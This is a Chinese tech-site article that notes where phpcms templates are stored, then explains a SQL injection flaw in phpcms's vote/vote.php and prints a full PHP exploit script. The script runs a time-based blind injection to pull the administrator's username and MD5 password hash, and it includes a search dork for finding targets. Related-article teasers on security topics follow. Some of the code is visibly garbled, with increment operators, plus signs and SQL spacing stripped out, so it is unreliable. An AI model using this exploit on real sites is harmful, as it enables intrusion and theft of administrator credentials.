phpcms模板在哪个文件夹？phpcms模板sql注射漏洞是怎么样的？

2018-01-15 20:08:19责编：llp 来源：驱动管家人气：

1.phpcms模板在哪个文件夹？

phpcms2008 目录：\templates\default\ 常用的模版在phpcms下面

phpcms v9 目录：\phpcms\\templates\default\ 常用的模版在content下面

2.phpcms模板sql注射漏洞是怎么样的？

漏洞代码：

vote/vote.php

// 22行

$optionids = is_array($op) ? implode(',',$op) : $op;

...

$db->query("UPDATE ".TABLE_VOTE_OPTION." SET number = number 1 WHERE optionid IN ($optionids) ");

漏洞很明显，没什么好说的，其他地方也有类似的问题，有兴趣的同学可以跟下，下面给个poc性质的exp[由于是盲注，效果不是很好]:p

代码:

#!/usr/bin/php

print_r('

---------------------------------------------------------------------------

Phpcms 2007 SP6 Bind SQL injection / admin credentials disclosure exploit

by puret_t

mail: puretot at gmail dot com

team: http://www.wolvez.org

dork: "Powered by Phpcms 2007"

---------------------------------------------------------------------------

');

/**

* works regardless of php.ini settings

if ($argc < 3) {

print_r('

---------------------------------------------------------------------------

Usage: php '.$argv[0].' host path

host:target server (ip/hostname)

path:path to phpcms

Example:

php '.$argv[0].' localhost /phpcms/

---------------------------------------------------------------------------

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$benchmark = 100000000;

$timeout = 10;

$cmd = 'voteid=999999&attribute=1&op=999999)ANDryat#';

$resp = send();

preg_match('/([a-z0-9] )_vote_option/', $resp, $pre);

if ($pre) {

echo "Plz Waiting...\n";

/**

* get admin password

$j = 1;

$pass = '';

$hash[0] = 0; //null

$hash = array_merge($hash, range(48, 57)); //numbers

$hash = array_merge($hash, range(97, 102)); //a-f letters

while (strlen($pass) < 32) {

for ($i = 0; $i <= 255; $i ) {

if (in_array($i, $hash)) {

$cmd = 'voteid=999999&attribute=1&op=999999)AND(IF((ASCII(SUBSTRING((SELECTpasswordFROM'.$pre[1].'_memberWHEREgroupid=1LIMIT1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))#';

send();

usleep(2000000);

$starttime = time();

send();

$endtime = time();

$difftime = $endtime - $starttime;

if ($difftime > $timeout) {

$pass .= chr($i);

echo chr($i);

break;

}

if ($i == 255)

exit("\nExploit Failed!\n");

}

$j ;

}

echo "\t";

/**

* get admin username

$j = 1;

$user = '';

while (strstr($user, chr(0)) === false) {

for ($i = 0; i <= 255; $i ) {

$cmd = 'voteid=999999&attribute=1&op=999999)AND(IF((ASCII(SUBSTRING((SELECTusernameFROM'.$pre[1].'_memberWHEREgroupid=1LIMIT1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))#';

send();

usleep(2000000);

$starttime = time();

send();

$endtime = time();

$difftime = $endtime - $starttime;

if ($difftime > $timeout) {

$user .= chr($i);

echo chr($i);

break;

}

if ($i == 255)

exit("\nExploit Failed!\n");

}

$j ;

}

exit("Expoilt Success!\nadmin:\t$user\nPassword(md5):\t$pass\n");

} else

exit("Exploit Failed!\n");

function send()

{

global $host, $path, $cmd;

$message = "POST ".$path."vote/vote.phpHTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "CLIENT-IP: ".time()."\r\n";

$message .= "Host: $host\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

$fp = fsockopen($host, 80);

fputs($fp, $message);

$resp = '';

while ($fp && !feof($fp))

$resp .= fread($fp, 1024);

return $resp;

}

怎么保护dns服务器？dns服务器的十种保护方法
本文收集总结了几点保护DNS服务器的有效方法，感兴趣的小伙伴们可以参考一下。
详情2018-01-04 17:09:39责编：llp 来源：驱动管家
心脏出血漏洞检测心脏出血漏洞检测软件
小编带来了心脏出血漏洞检测软件下载地址，大家可以下载心脏出血漏洞一键检测app，为了我们账户的安全，大家都可以检测一下自己的手机是否存在心脏出血漏洞哦~尽管“心脏出血”是一个网络漏洞，但是某些手机App通
详情2018-01-07 08:24:37责编：llp 来源：驱动管家
2016年木马病毒查杀软件的排行榜
现在的电脑杀毒软件种类很多，在选择的时候，很多人并不知道如何去进行选，按照什么标准来进行选择，其实在选择杀毒软件首先要看杀毒能力，其次可以根据杀毒软件的功能来进行判定排名，下面就和大家一起来分析一
详情2018-01-05 13:58:41责编：llp 来源：驱动管家
文档安全的加密技术文档安全加密系统的原理
加密技术是利用数学或物理手段，对电子信息在传输过程中或存储设备内的数据进行保护，以防止泄漏的技术。在信息安全技术中，加密技术占有重要的地位，在保密通信、数据安全、软件加密等均使用了加密技术。常用的
详情2018-01-13 15:37:44责编：llp 来源：驱动管家
怎么查证你的浏览器存在ie漏洞？
JavaScript IE 6 漏洞　　其利用代码如下： <script type= "text jscript "> function init() { document write( "The time is: " Date() ); } window onload = init; < script>　　利用此代码可
详情2018-01-10 09:59:11责编：llp 来源：驱动管家
物联网是什么？物联网时代该怎么保护你的隐私？
什么是物联网，我百度了好多地方，觉得答案实在太官方了。我觉得物联网就是把身边的一切连在一起，包括你曾经认为和网搭不上边的东西，沙发、电视、电饭煲，这一切都被网络连在一起。以后恐怕连战争，都是黑客之
详情2018-01-11 19:49:18责编：llp 来源：驱动管家
手机root好不好？手机root为漏洞利用打开方便之门
也许你的手机ROOT只是为了安装一款游戏，安装一个工具。对我们普通人来说，ROOT代表着方便和自由，其实你不知道的是，它同时也为黑客带来了侵犯你隐私的方便和自由。看看ROOT后的手机是怎样为漏洞大开方便之门的
详情2018-01-12 10:55:50责编：llp 来源：驱动管家
u盘病毒的分析 u盘病毒的应对策略
分析：　U盘对病毒的传播要借助autorun inf文件的帮助，病毒首先把自身复制到u盘，然后创建一个autorun inf,在你双击u盘时，会根据autorun inf中的设置去运行u盘中的病毒，我们只要可以阻止autorun inf文件的创建
详情2018-01-06 14:21:52责编：llp 来源：驱动管家
电脑文件夹加密怎么做？硬件文件夹加密好还是软件文件夹加密好？
现在，在公司上班族中，由于每天都会形成很多工作文件，一些文件还涉及到单位的无形资产和商业机密，如何保护这些文件的安全就成为当前企业网络管理的重要方面。而对于电脑文件加密，则通常有两种方法：软件加密
详情2018-01-07 08:28:05责编：llp 来源：驱动管家
科迅会员上传webshell漏洞？文件webshell漏洞怎么修复？
会员上传文件漏洞，可以上传任意后缀user swfupload asp文件漏洞复制代码代码如下:If UpFileObj Form( "NoReName ")= "1 " Then & 39;不更名Dim PhysicalPath,FsoObj:Set FsoObj = KS InitialObject(KS Settin
详情2018-01-11 14:54:27责编：llp 来源：驱动管家